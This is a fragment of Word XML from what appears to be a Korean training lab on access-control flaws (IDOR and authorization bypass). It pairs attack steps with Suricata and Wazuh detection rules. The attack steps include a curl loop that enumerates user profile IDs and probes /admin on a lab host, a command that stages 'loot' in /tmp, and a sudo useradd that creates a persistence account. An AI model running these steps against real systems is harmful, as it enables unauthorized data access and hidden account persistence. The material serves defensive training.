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W9] 접근제어 — IDOR/권한상승/인가우회 vs 인가 통제 점검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9주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>접근제어(IDOR/권한상승/인가우회)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. 공격자는 객체 참조/권한 경계를 우회하고, 점검자(너)는</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>인가 통제를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IDOR/인가우회(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wv09r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)로 타인 자원에 접근하고 추출 자원(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv09idor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wva09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IDOR 탐지, ② 인가 우회 Wazuh 룰, ③ 접근제어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태그/자원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`wv09r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 추출 자원 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.wv09idor`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wv09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`wva09`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9909011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105091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[IDOR/인가우회] — 객체 참조 조작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for id in 1 2 3 1000; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  curl -s -A "wv09r1-kim" -H "Host: neobank.6v6.lab" "http://192.168.0.161/api/user/$id/profile?probe=wv09r1-kim"</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:t>curl -s -A "wv09r1-kim" -H "Host: neobank.6v6.lab" "http://192.168.0.161/admin?wv09r1-kim"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wv09r1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[무단 자원 추출] — 타인 자원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'wv09 IDOR loot: other users profiles, admin-only data accessed' &gt; /tmp/.wv09idor</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash wva09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/tmp/.wv09idor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wv09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wva09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[IDOR/열거 탐지] — Suricata 룰 (sid 9909011)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(msg:"WEBVULN-W09 IDOR object reference enumeration"; flow:to_server; http.uri; content:"/api/user/"; nocase; sid:9909011;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9909011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[인가우회 탐지] — Wazuh 룰 (id 105091)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id="105091" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;wva09&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;WEBVULN-W09 - IDOR / authorization bypass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105091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[접근제어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접근제어 점검(객체 수준 인가/함수 수준 인가/수직·수평 권한 경계) + 방어(서버측 인가/간접 참조) + 위험도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추출 자원(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv09idor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(wva09)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접근제어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